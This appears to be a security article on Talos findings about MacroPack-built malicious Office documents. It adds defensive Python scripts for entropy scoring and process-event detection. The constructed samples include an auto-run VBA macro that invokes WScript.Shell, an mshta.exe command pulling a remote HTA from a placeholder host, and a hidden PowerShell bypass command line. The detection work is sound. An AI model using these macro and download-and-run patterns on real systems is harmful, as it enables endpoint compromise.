
Cisco Talos recently uncovered a series of malicious Microsoft Office documents uploaded to VirusTotal between May and July 2024 from several countries, including China, Pakistan, Russia, and the U.S. The documents were generated with MacroPack, a payload generator framework intended for Red Team exercises. Talos assesses with moderate confidence that threat actors are misusing the tool to deploy malicious payloads, including the Brute Ratel and Havoc post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT).
MacroPack: A Double-Edged Sword
MacroPack is designed to simplify the generation of various payloads, which has made it a favored tool among security professionals for Red Teaming. Its ease of use and built-in obfuscation make it equally appealing to threat actors. The framework packages payloads into Office document formats, scripting files, and shortcut (LNK) files, and makes the result harder to detect through the following features:
- Function and variable renaming
- Removal of surplus space characters and comments
- String encoding
- Payload obfuscation
While MacroPack offers a professional version with additional capabilities like anti-malware bypass, anti-reversing, and more advanced payloads, the free version is publicly accessible, raising concerns about its misuse for malicious purposes.
Common Characteristics and Non-Malicious Code
All analyzed documents exhibited similar characteristics, such as obfuscated VBA macros with varying degrees of complexity and diverse lure themes. The lure content ranged from generic prompts instructing users to enable macros to official-looking documents purportedly from military organizations. This variability points to multiple threat actors leveraging the same tool.
Interestingly, Talos noted the presence of four non-malicious VBA subroutines in all samples, which were not obfuscated and had no connection to other malicious code in the documents. Initially believed to be the hallmark of a single actor, further analysis revealed that these subroutines were likely added by the professional version of MacroPack, a theory confirmed through reliable sources.
MacroPack’s Obfuscation Techniques
MacroPack's obfuscation methods include a payload string deobfuscation function and a random name generator based on Markov chains, which produces function and variable names that look like real words rather than random character runs. The Markov-chain names avoid the obviously random identifiers that simple heuristics flag, while the unobfuscated, non-malicious subroutines lower the overall entropy of the macro code. That matters because some anti-malware engines flag code with high entropy: padding a document with low-entropy benign subroutines pulls its average entropy down and lowers suspicion.
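The entropy trick above is easy to reproduce, and just as easy to see through if the measurement is taken per procedure rather than per document. The script below is an added example written for this article, not code from Talos or from MacroPack. It embeds a constructed VBA sample: one AutoOpen subroutine carrying a high-entropy blob (a deterministic, inert stand-in built from base64 of all 256 byte values) under Markov-style nonsense identifiers, plus two readable padding subroutines of the kind described above. It then computes Shannon entropy for the whole text, for each procedure, and for each string literal. The procedure names, identifiers and thresholds are assumptions chosen for the demonstration.

```python
from __future__ import annotations

import base64
import math
import re
from collections import Counter

# Deterministic, inert stand-in for an encoded payload string: base64 of all
# 256 byte values twice over. It is not a real payload; it only needs to look
# like the high-entropy blobs that MacroPack-obfuscated macros carry.
BLOB = base64.b64encode(bytes(range(256)) * 2).decode()

# Constructed VBA, hypothetical and not taken from any Talos sample. AutoOpen
# carries the blob under Markov-style nonsense identifiers; the two procedures
# in PADDING_VBA are readable, low-entropy filler of the kind the article
# describes being added to every sample.
OBFUSCATED_VBA = f'''
Sub AutoOpen()
    Dim qvlom As String
    Dim reslat As Object
    qvlom = "{BLOB}"
    Set reslat = CreateObject(Replace("W?cript.Shell", "?", "S"))
    reslat.Run qvlom, 0, False
End Sub
'''

PADDING_VBA = '''
Sub FormatReportHeader()
    Dim headerRange As Range
    Set headerRange = ActiveDocument.Paragraphs(1).Range
    headerRange.Font.Bold = True
    headerRange.Font.Size = 14
    headerRange.ParagraphFormat.Alignment = wdAlignParagraphCenter
End Sub

Sub InsertTableOfContents()
    Dim tocRange As Range
    Set tocRange = ActiveDocument.Range(0, 0)
    ActiveDocument.TablesOfContents.Add Range:=tocRange, UseHeadingStyles:=True
End Sub
'''

# One Sub/Function from its header line through the matching End Sub/Function.
PROC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+)?(Sub|Function)\s+(\w+)\s*\([^)]*\)[^\n]*\n"
    r"(.*?)^[ \t]*End\s+\1\b",
    re.MULTILINE | re.DOTALL,
)
# VBA string literal; a doubled quote is an escaped quote inside the literal.
STRING_LITERAL_RE = re.compile(r'"((?:[^"\n]|"")*)"')


def shannon_entropy(text: str) -> float:
    """Shannon entropy of text in bits per character (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_procedures(vba: str) -> dict[str, str]:
    """Map each Sub/Function name to its source from the header through End Sub."""
    return {m.group(2): m.group(0) for m in PROC_RE.finditer(vba)}


def procedure_entropies(vba: str) -> dict[str, float]:
    """Entropy of every procedure on its own, so padding cannot mask a bad one."""
    return {name: shannon_entropy(src) for name, src in split_procedures(vba).items()}


def suspicious_literals(vba: str, min_len: int = 32, min_entropy: float = 4.0) -> list[str]:
    """String literals long and random-looking enough to be encoded data (thresholds assumed)."""
    return [s for s in STRING_LITERAL_RE.findall(vba)
            if len(s) >= min_len and shannon_entropy(s) >= min_entropy]


def report(vba: str) -> dict:
    """Document-level and per-procedure entropy plus any flagged literals."""
    procs = procedure_entropies(vba)
    return {
        "document_entropy": shannon_entropy(vba),
        "mean_procedure_entropy": sum(procs.values()) / len(procs) if procs else 0.0,
        "procedures": procs,
        "flagged_literals": suspicious_literals(vba),
    }


if __name__ == "__main__":
    for label, doc in (("obfuscated only", OBFUSCATED_VBA),
                       ("obfuscated + padding", OBFUSCATED_VBA + PADDING_VBA)):
        r = report(doc)
        print(f"{label}: document {r['document_entropy']:.2f} bits/char, "
              f"mean per procedure {r['mean_procedure_entropy']:.2f}")
        for name, h in r["procedures"].items():
            print(f"  {name:<24} {h:.2f}")
        print(f"  flagged literals: {len(r['flagged_literals'])}")
```

Adding the two padding procedures drags the mean per-procedure figure down, which is the evasion at work, but the per-procedure view still singles out AutoOpen and the literal check still flags the blob. A scanner that scores a document by one aggregate entropy number is the one that gets fooled; scoring each procedure and each long string literal separately is the check worth having.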

Clusters of Malicious Documents and Their Payloads
Despite similar Tactics, Techniques, and Procedures (TTPs) across various documents, Talos was unable to attribute the activity to a single threat group. Here’s a closer look at the distinct clusters identified:
Cluster 1: Chinese Lures
Uploaded from IP addresses in China, Taiwan, and Pakistan, these documents featured generic Word content prompting users to "enable content" so that the VBA macros would run. The associated payloads included the Havoc demon (the agent of the Havoc post-exploitation C2 framework) and Brute Ratel implants. Notably, all C2 IP addresses linked to these payloads were located within the same autonomous system (AS4837) in Henan, China. This commonality suggests a single actor, although attribution remains inconclusive.
Cluster 2: Pakistani Military Lures
This cluster contained documents with themes related to the Pakistani military, uploaded from different locations in Pakistan. The lures included fake circulars announcing rewards for military personnel and employment confirmation letters for Pakistan Air Force Cyber Team members. Both documents deployed Brute Ratel badgers via DLL-based shellcode loaders, using DNS over HTTPS and Amazon CloudFront CDN domains for C2 rotation. This setup points to a relatively sophisticated operation, and Talos could not rule out that it was Red Team activity.
Cluster 3: Russian Lures
Unlike the previous clusters, the document from Russia was an Excel workbook with no visible content. The VBA code executed in two stages, with the second stage downloading a PhantomCore backdoor, a Golang-based RAT attributed to the Ukrainian hacktivist group Head Mare, which allegedly targets Russian entities for cyber espionage. This variant used an unusual execution method: it created a new Excel application instance and injected the second-stage VBA into it, a technique reminiscent of VBA viruses.
Cluster 4: U.S. Lures
Uploaded in March 2023, the final cluster involved a lure mimicking an encrypted NMLS renewal form. This document leveraged MacroPack's Markov chain-based name generator to create plausible function and variable names, making the malicious code harder to spot. Delivery ran through multiple VBA stages; the last of them executed a command line through mshta.exe, a signed Windows binary, to download what was likely an HTML Application (HTA). Talos was unable to retrieve that final payload, which leaves open the possibility that this was a Red Team exercise.
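Whatever the final HTA was, the step that touched the endpoint is visible in process telemetry: an Office application spawning mshta.exe with a remote location on its command line. The script below is an added detection example written for this article, not code from Talos. It runs two rules over constructed process-creation events shaped like Sysmon Event ID 1 fields: an Office host spawning a script interpreter or download-capable system binary, and mshta.exe being handed a remote script or HTA location or inline script. The host and binary lists, the paths, the URL and the command lines are all invented for the demonstration; only mshta.exe is established by the article.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Office hosts whose macros have no business launching script interpreters or
# download-capable system binaries. Both sets are assumptions; tune them to
# your estate (the article only establishes mshta.exe as the cluster 4 stage).
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS_AND_LOLBINS = {
    "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
# A URL or UNC path on the mshta.exe command line means the HTA is fetched remotely.
REMOTE_REF = re.compile(r"\b(?:https?|ftp)://|\\\\[\w.-]+\\", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record, shaped like Sysmon Event ID 1 fields."""
    parent_image: str
    image: str
    command_line: str


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: ProcessEvent) -> list[str]:
    """Return the reasons this event looks like a macro-launched stage, if any."""
    parent, child = image_name(event.parent_image), image_name(event.image)
    reasons = []
    if parent in OFFICE_HOSTS and child in SCRIPT_HOSTS_AND_LOLBINS:
        reasons.append(f"{parent} spawned {child}")
    if child == "mshta.exe":
        if REMOTE_REF.search(event.command_line):
            reasons.append("mshta.exe pointed at a remote HTA/script location")
        if INLINE_SCRIPT.search(event.command_line):
            reasons.append("mshta.exe given inline script")
    return reasons


def triage(events) -> list[tuple[ProcessEvent, list[str]]]:
    """Keep only the events that trip at least one rule."""
    return [(e, reasons) for e in events if (reasons := assess(e))]


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"

# Constructed sample telemetry: the paths, user name, file names and URL are invented.
SAMPLE_EVENTS = [
    ProcessEvent(WINWORD, r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://example.invalid/nmls/renewal.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe", WINWORD,
                 f'"{WINWORD}" /n "C:\\Users\\alice\\Downloads\\renewal.docm"'),
    ProcessEvent(EXCEL, r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c powershell -w hidden -ep bypass -f C:\Users\alice\AppData\Local\Temp\s1.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe "C:\Users\alice\AppData\Local\Temp\setup.hta"'),
    ProcessEvent(WINWORD, r"C:\Windows\splwow64.exe", "splwow64.exe 8192"),
]

if __name__ == "__main__":
    for event, reasons in triage(SAMPLE_EVENTS):
        print(f"ALERT {image_name(event.parent_image)} -> {image_name(event.image)}: "
              f"{'; '.join(reasons)}")
        print(f"      {event.command_line}")
```

The first rule catches the Office-to-LOLBin parent relationship regardless of what the command line says; the second catches mshta.exe reaching out even when it was launched by something other than Office. A user double-clicking a local HTA from Explorer trips neither, which keeps the noise down, and a Word document opened from Explorer is of course silent. In the cluster 3 case, where a second Excel instance is created through automation, the new process is not a child of the first, so a parent-child rule like this one would not see it; that variant needs a different signal.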
Conclusion
The misuse of MacroPack by threat actors highlights the blurred line between tools intended for legitimate security testing and their use in real intrusions. While attribution of these activities remains elusive, the findings underscore the importance for defenders of treating benign-looking documents as a live threat, particularly where Office is outdated or macro settings have been relaxed.
Organizations should keep every Microsoft Office installation current, because recent builds block macros in files that carry the Mark of the Web by default, and should enforce that behavior through Group Policy so users cannot click through the warning. Monitoring for Office applications spawning script interpreters or system utilities such as mshta.exe, watching network traffic for connections to known C2 infrastructure, and following established handling procedures for suspicious documents further strengthen defenses against campaigns like these.